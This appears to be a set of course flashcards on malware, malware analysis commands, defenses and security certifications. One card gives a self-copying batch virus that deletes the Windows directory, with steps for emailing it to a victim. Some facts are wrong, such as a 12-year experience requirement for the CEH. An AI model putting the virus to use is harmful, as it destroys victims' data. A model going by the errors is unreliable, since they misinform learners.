CS 3710 Quiz 3

Application Defenses

- Implementing regular antivirus screening on all host systems - Ensuring that virus definition files are up to date - Requiring scanning of all removable media - Installing personal firewall and IDS software on hosts - Deploying change detection software and integrity checking software - Maintaining logs - Implementing email usage controls and ensuring that email attachments are scanned

Dynamic Analysis Steps

1. Clean Snapshot - Start with a fresh VM or a separate machine 2. Run monitoring tools 3. Run the malware - This should be done with administrator or root privileges so that we can see what the malware is doing 4. Stop the monitoring tools 5. Analyze results

Creating a Virus

1. Create a batch file game.bat with malicious code 2. Convert the game.bat batch file to game.com using the bat2com utility. While game.com looks like a website URL, com files are executables on Windows. 3. Send the game.com file as an email attachment to the victim. 4. When game.com is executed by the victim, ti copies itself to all the .bat files in the current directory on the target machine and deletes all the files int he Windows directory.

Virus Example

@echo off for %%f in (*.bat) do copy %ff + game.bat del c:\Windows\*.* This is an example virus. The first line will turn off echo, which means that the virus's commands will not be displayed in the command line as they are executed. The next line searches through all the batch files in the current directory and copies itself to those files. Finally, the last line deletes the Windows directory which includes files that are important for Windows to run properly.

Logic Bomb

A computer program or part of a program that lies dormant until it is triggered by a specific logical event. These typically originate with organization insiders because people inside an organization generally have more detailed knowledge of IT infrastructure.

Botnet

A group of compromised computers or mobile devices connected to a network. This can be used for DDOS attacks.

DoD Directive 8140

A new, operationally focused cybersecurity training framework that replaces DoD Directive 8570.01. This was developed by the Defense Information Systems Agency (DISA). It contains government-approved certification requirements. The goal is to "establish a robust workforce training and certification program that will better prepare DoD cyberwarriors to operate and defend our networks in an increasingly threat-based environment."

Hash

A number generated by an algorithm from a text string. Also known as a message digest. There are hashes of all the binary files in an operating system. We can compute the hash of files on the target machine and compare it with the publicly available hash of the file to determine if a binary file has been replaced with malware.

Symantec

A software company which is famous in providing cyber security products and services, e.g. Norton Anti-virus This offers the Storage Foundation, Cluster Server, Net Backup, Enterprise Vault, Endpoint Protection, Backup Exec Certificates.

Worm

A software program capable of reproducing itself that can spread from one computer to the next over a network. This program works by infecting a host and searching for the system for other email addresses. The worm then sends itself using SMTP or through the host's target system. Propogation continues until worm-triggering condition expires or until security patches are implemented.

Adware

A software program that delivers advertising content in a manner that is unexpected and unwanted by the user. This may not be malicious but consumes resources.

Open Source Tool

A software tool that is available to all potential users in source code form, usually via the internet. Its users are permitted, usually under license, to study, change, improve and, at times, to distribute the software. Many of these open source tools are built already into Kali Linux. This is useful for learning about tools and techniques used in cybersecurity.

Remote Access Trojan

A type of malware that allows covert surveillance, a backdoor for administrative control and unfettered and unauthorized remote access to a victim's machine.

Rootkit

A type of malware that replaces one or more existing programs to hide the fact that the computer has been compromised. Modify parts of the operating system to conceal presence. Provides attackers with access to compromised computers and easy access to launch additional attacks. Difficult to detect and remove.

Active Content Vulnerabilities

Active Content refers to dynamic objects that do something when the user opens a web page, e.g. Javascript, Java, macros, browser plugins. These have potential weaknesses that malware can exploit. These are considered mobile code because these programs run on a variety of computer platforms. Users download bits of mobile code, which then gain access to the hard disk and do things like filling up the desktop with infected file icons. Programs can also modify and steal data on a web page.

Malicious Addon

Addons are companion programs that extend the web browser's functionality but can also decrease security. These are addons that contain some type of malware that, once installed, perform malicious actions. Users should only install browser addons from trusted sources.

Webinar

An interactive Web-based seminar or training session. These are usually free resources for self-study.

File System Monitoring

Are new files created by the malware? Are any files modified? iNotify and iWatch can be used to perform this.

CompTIA

Computing Technology Industry Association. This offers the Security+ and CASP certifications. The Security+ certification is an entry-level certification that is valuable for getting entry-level jobs. There are community college classes that train students to pass the Security+ certification.

Information Security Education

Consists of degrees, certificates, and certifications.

Spam

Consumes computing resources bandwidth and CPU time Diverts IT personnel from activities more critical to network security Is a potential carrier of malicious code Compromises intermediate systems to facilitate remailing services Opt-out and unsubscribe features in spam messages can represent a new form of reconnaissance attack to acquire legitimate target addresses

Vendor Neutral Certifications

Covers concepts and topics that are general in nature Does not focus on a specific product or product line These ensure that you know the foundations of cybersecurity.

Network Defenses

Creating chokepoints in the network Using proxy services and bastion hosts to protect critical services Using content filtering at chokepoints to screen traffic Ensuring that only trusted sources are used when installing and upgrading OS code Disabling any unnecessary network services and processes that may pose a security vulnerability Maintaining up-to-date IDS signature databases Applying security patches to network devices to ensure protection against new threats and reduce vulnerabilities Employing filtering software that blocks traffic to and from network segments or specific services Employing active sensors that react quickly enough to prevent or mitigate damage. Employing chokepoints in the network to force traffic through zones of protection Allowing sensors and filters to inspect traffic before permitting it to pass through a protected network Setting up security properties within browsers to prohibit or prompt before processing scripts and active code Eliminating unnecessary remote connections to the network and employing effective access control measures to protect the ones that remain available Avoiding the circumvention of countermeasures and control systems

cat /etc/crontab

Cron is a built-in scheduler in Linux systems. Attackers use this to enable persistance. Crontab lists the programs that are scheduled to be run at a certain time.

Malware Analysis

Determine the nature and purpose of malware. Understand how it works, how to detect it, and how to eliminate it. How was the target compromised? What is the impact? Should analyze the binary in a safe environment. To figure out if other machines are compromised, monitor IP addresses and packets to see if the malware is sending itself.

Homepage Hijacking

Exploits browser vulnerability to reset the homepage. Goes to the copycat website with malicious code instead of the real one. This covertly installs a browser helper object (HBO) Trojan program.

Portable Executable

File format is a data structure containing the information necessary for the Windows OS loader to manage the wrapped executable code. The file extensions are usually .exe, .com, .dll, or .sys.

Vendor Specific Certifications

Focuses on in-depth product knowledge You should only get these using your employer's benefits package because they are specific to tools and software a specific organization provides. Organizations often use vendor-specific certifications along with vendor-neutral certifications when evaluating prospective employees and personnel

Information Assurance Manager

Individual responsible for the information assurance program of a DOD information system or organization. These require certifications such as CAP, CISM, and CISSP.

ISACA

Information Systems Audit and Control Association. This organization offers the CISM, CISA, CGEIT, and CRISC certifications.

ISC2

International Information Systems Security Certification Consortium. This organization offers the SSCP as an entry level certification and the CISSP as a certification for more experienced cybersecurity professionals. ISC2 - Costs $250 and requires 1 year of experience in the cybersecurity field. CISSP - Costs $750 for the exam and 5 years of experience in the cybersecurity field.

ls -alt /bin/

Linux OS executable binaries are located in /bin. This command lists all the files that are located in the bin folder. -a - This shows hidden files -l - Provides extended attributes such as file directory permissions, owner name, group name, modification time, and file size. -t - This sorts the files by date and time. We want to sort by date and time to see the programs that were added after the operating system was installed. These could likely be rootkits.

Information Security Properties

Malware attacks all of these. Confidentiality - Malware could expose an organization's private information Integrity - Malware could modify database records, either intentionally or over a period of time Availability - Malware can erase or overwrite files or inflict considerable damage to storage media

Cisco

Offers the CCENT, CCT, CCDA, CCNP, CCDE, CCIE, and CCAr certificates.

Juniper

Offers the JNCIA, JNCIS, JNCIP, JNCIE certificates.

RSA

Offers the RSA Archer and the RSA SecurID certificates.

Certification

Organizations in Industry usually grant these. This mainly involves paying a fee and passing an exam. These could be required for government jobs.

Memory Analysis

Some worms and viruses run entirely in memory to avoid antivirus systems searching for files on the disk. Analysis of these worms and viruses requires looking in memory to find the malicious code.

Webpage Defacement

Someone gaining unauthorized access to a web server and altering the index page of a site on the server The attacker replaces the original pages on the site with altered versions

Melissa Virus

Spread through an infected Microsoft Word document attached to an email with the header Important Message From [victim's username]. When the Microsoft Word document was opened, the virus would use Outlook to send emails to the first 50 contacts in the user's contact list. The virus would also overwrite important system files, which could crash the computer.

NSA/DHS Centers for Academic Excellence

The National Security Agency and the Department of Homeland Security certify schools for providing a complete cybersecurity education.

which <command>

The command is used to locate files that exist within directories listed in the PATH variable. This can be used to look for rootkits.

Instructor Led Programs

These are an alternative to self-study learning. This can be continuing education at a university or a community college. Vendors and other organizations such as SANS may provide these programs. These provide formal training courses that lead to a certificate of completion or professional certification and not a degree. Courses can range from very general to highly specific and technical. Most organizations offer continuing education benefits that can pay for these programs.

SANS, ISC2

These are expensive conferences and boot camps. Cybersecurity professionals that attend these are usually sponsored by their employers.

Certificate

These are granted by an acdemic institution. They are called stackable credentials because they are additional credentials on top of your bachelor's degree. Usually consists of 3-6 classes and are considered below a Master's degree.

Post Secondary Degree Program

These are offered through colleges and universities and result in a Bachelor, Master, or Ph.D. These programs are available for Information Systems Security, Cybersecurity, and Information Assurance. These may be classroom-delivered, online-delivered, or blended-delivered for Bachelor's level up to Ph.D.

Book

These can be considered free to affordable methods of self-study.

Online Video

These can be considered free to affordable methods of self-study. These include YouTube videos, Coursera, and Edx. Coursera and Edx offer online courses for free or at an affordable rate.

Information Security Training Programs

These differ from cybersecurity education programs in their focus on hands-on skills and in their duration. These will meet for intensive sessions lasting from a few hours to several days. They rapidly train students in one or more skills to cover essential skills or to cover essential knowledge in one or more specific areas. Some employers have specific training requirements. For example, the US O.P.M. requires federal agencies provide training suggested by NIST guidelines.

SANS/GIAC

These organizations offer a wide variety of cybersecurity certificates such as the G2700, the GCFE, and the GSEC. The first certificate you start with is the GSEC certification. These are expensive and cost $2500.

DoD Directive 8570.01

This affects any DoD facility or contractor organization. It ensures that all personnel that are directly involved with information security posess security certifications. Includes Information Assurance Training, Certification, and Workforce Management. This has been replaced by DoD directive 8140.

find / -executable -type f

This command is an example of binary discovery. It finds files, looks for ones that are executable, and starts the search from the root directory.

compgen -ac

This command prints out all the commands that are available on the system. c - lists all the commands a - lists any aliases If there is a suspicious command in the list, check to see if there is a man page. If there isn't one, it could be a virus.

Infection Vector

This describes the virus's method to propogate within the target system. This includes a search routine that locates new target files and a replicate routine to copy itself onto the target program.

file <filename>

This determines the file type. Attackers can change file extensions to masquerade the file as an image or a document file, but this command will show that the binary is executable. If the file is executable, this will print out the architecture. Not stripped - This means that the executable file contains the symbol table, which contains references to variable names, function names, etc. Attackers will commonly take the symbol table out to make it harder to debug. 64-bit ELF - Executable and Linkable Format - This is the standard binary format for 64-bit Unix systems. LSB - This refers to the Linux Standard Base

Snugy

This exploits Powershell to create a backdoor. It communicates using DNS so that the traffic appears like DNS when the user views incoming and outgoing traffic on Wireshark.

Dynamic Analysis Monitoring

This includes the following: Process monitoring File system monitoring Registry monitoring Network monitoring

Process Monitoring

This involves checking to see if the malware creates or runs processes. This can be done using the Process Monitor or Process Hacker tools.

Network Monitoring

This involves running the malware and using a packet sniffer to monitor the malware's interaction with the system and the network. To do this, instead of connecting to the Internet or the actual network, the target machine is instead connected to a switch. This allows the tester to see the malware's network traffic without exposing the malware to other machines.

Tinba

This is a Banking Trojan, and its name stands for Tiny Banker. It is described as tiny because the virus file size is very small. It collects data from login pages and web forms.

NanoCore

This is a Remote Access Trojan that is spread using a malicious Excel spreadsheet. It adds registry keys for persistence and allows attackers to spy on systems and access systems.

Agent Tesla

This is a Remote Access Trojan. It affects Windows systems and can be brought on the dark web.

Gh0st

This is a Remote Access Trojan. It infects Windows systems and creates a backdoor.

UrSnif

This is a banking trojan. It is delivered through malicious spam as a Microsoft Word Document. It collects cookies and web forms and uses TLS to send the data it has collected to a remote system.

Zeus

This is a banking trojan. It logs keystrokes in the background and looks for when the user is accessing a bank account. It can hijack the current bank account session even if the user turns on multi-factor authentication.

Information Assurance Technician

This is a category of DoD cybersecurity jobs. These are entry-level jobs, and require certifications such as the A+ CE, Security+ CE, and SSCP.

CoinMiner

This is a cryptocurrency miner that attacks Window's Window Management Interface and control panel. It uses the WMI to create persistence. It is spread through malicious spam and runs in the background of the victim's machine.

EC-Council

This is a cybersecurity certification, education, and training organization. It offers the Certified Ethical Hacker (CEH) certification, but this requires 12 years of experience.

Lingyun Net

This is a form of riskware, which acts like a virus, but may not pose a security risk. It makes the computer slow but does not steal any data.

Malware

This is a shortened form of the words malicious software. This is any program that carries out actions that you do not intend. Software designed to infiltrate or damage a computer system without the user's informed consent.

Smurf Attack

This is a type of DOS attack. 1. The attacker temporarily spoofs the IP address of the target machine. 2. The attacker sends a broadcast using an ICMP message which requests the receiver computers on the same network to respond with a ping to the machine with the sender's IP address. 3. The attacker changes its IP address before the receiving computers have a chance to respond. 4. The target machine receives all the pings from the other computers on the network.

Trigger

This is also called a logic bomb. This is the action that causes the virus payload to activate. A trigger could be a specific time and date, a double click, or some other action.

Self-study

This is an essential part of cybersecurity because cybersecurity professionals have to learn and adapt to new threats, vulnerabilities, and attacks. They need to keep qualifications up throughout their career to stay relevant and keep their jobs.

Cybrary

This is an online learning platform that provides free cybersecurity and IT training courses. The courses they offer include ethical hacking, network security, cloud security, digital forensics, and incident response. This is considered a free method of self-study.

hexdump -C <filename> | more

This is another way of disassembling a binary file. The -C option formats the hexadecimal. On the right panel, this will show the binary formatted into ASCII. Piping it to more means that the terminal will only show a couple of lines at once. If the user wants to see more lines, he or she can click the spacebar.

Continuing Professional Education

This is required to maintain certifications. Examples include courses, training, contributions to the profession, volunteering, and unique work experiences. The requirements and the number of credits are unique to each certification. This may also include a maintenance fee. You could lose your certification if you don't maintain your CPE.

Code Analysis

This is reviewing the assembly code of the virus. Static code analysis involves disassembling the binary and viewing the program to see what it is doing. Dynamic analysis is debugging the binary in a controlled manner such as using gdb. This requires understanding OS concepts and Assembly.

Trojan Horse

This is the largest class of malware. This is any program that is masquerading as a useful program while hiding malicious intent. This relies on social engineering to spread and operate. It spreads through email messages, website downloads, social networking sites, and automated distribution agents (bots).

Payload

This is the main function of the program that performs the action of the virus. Payload actions may include deleting files, eavesdropping, or duplicating themselves.

Registry Monitoring

This is useful if the target machine is Windows. Registry keys allow programs to boot immediately after the machine starts up without user intervention. Malware will often modify registry keys to establish persistence. We want to check what registry settings the malware accesses or modifies.

Malware as a Service

This is where attackers sell malware on the dark web and users can pay attackers to inflict an organization for a fee.

Static Analysis

This is where the virus binary is analyzed without running it. This is a safe form of analysis. Using metadata of the binary can be a starting point to find out the file type, if the binary is executable, and what system architecture is the virus meant for. Can use objdump to disassemble the binary and look at the Assembly code.

Dynamic Analysis

This is where the virus binary is run on a standalone system which can be a VM or a standalone machine. While the virus is running, the security professional should monitor the interactions and effects of the virus.

iptables -L

This lists the rules that are in IPTables.

ps -u root

This lists the running processes that are running as root.

Check Point

This offers the CCSPA, CCSA, CCMA, CCMSE, CCEPA, and the CCEPE certificates.

Binary

This refers to any non-text files, which can include executables. For example, a JPEG file can be classified as this.

top

This shows processes that take up the most CPU resources.

objdump -f <filename>

This shows the header and metadata for the file. The -f option provides metadata for the binary file, including the file format, architecture, flags, and start address.

CIW

This stands for Certified Internet Web Professional. These certificates relate to web app security. These include the Web Security Associate, Web Security Specialist, and Web Security Professional certifications.

ldd -v <filename>

This stands for List Dynamic Dependency. This prints out any shared libraries that the binary is using.

readelf -h <file>

This tells the user whether or not the file is executable. If the file is executable, it provides information such as the target architecture, the number of section headers, the format of the file, etc. -h gives you the header output of the file

updatedb

This updates the database of the locate tool. After this is updated, you can locate the files on the operating system. e.g. locate "cat" - Locates any file with cat in its name.

ILOVEYOU virus

This virus is written in VB Script. It is distributed through email and affects the Outlook client. Once the victim's machine is infected, it will send to all users in the contact. The email's header is I Love You, so the targets would read the email and download the attachment. It attaches itself to files such as JPEG, MP3, CSS, and JS files. It establishes persistence by modifying registry keys. It updates the IE start page to download another malicious executable.

Session Manager 2

This was a piece of malware intended for IIS. IIS is a Windows web server software. It enables a backdoor and facilitates cross-site scripting and cross site request forgery.

strings <filename>

This will print out any ASCII or Unicode characters in the file. This is useful for finding hardcoded values e.g. IP addresses.

Stuxnet

This worm was engineered by American and Israeli researchers to attack microprocessors on Iranian centrifuges. American researchers researched vulnerabilities in the Siemens control systems that were to be delivered to Iran. This worm will make the centrifuges spin at a high rate and makes the reporting systems not detect it.

Vendor

Vendors may provide demo copies of hardware or software. They also may offer free training. These are considered free to moderately expensive ways of self-study.

Finding Executables

for i in $(find / -executable -type f) do file -i $i | grep -i 'x-executable; charset=binary' done For every line in the output of find, run the file command and only display executable files.

OS Defenses

• Deploying change detection and integrity checking software and maintaining logs • Deploying or enabling change detection and integrity checking software on all servers • Ensuring that operating systems are consistent and have been patched with the latest updates from vendors • Ensuring that only trusted sources are used when installing and upgrading OS code • Disabling unnecessary OS services and processes that may pose a security vulnerability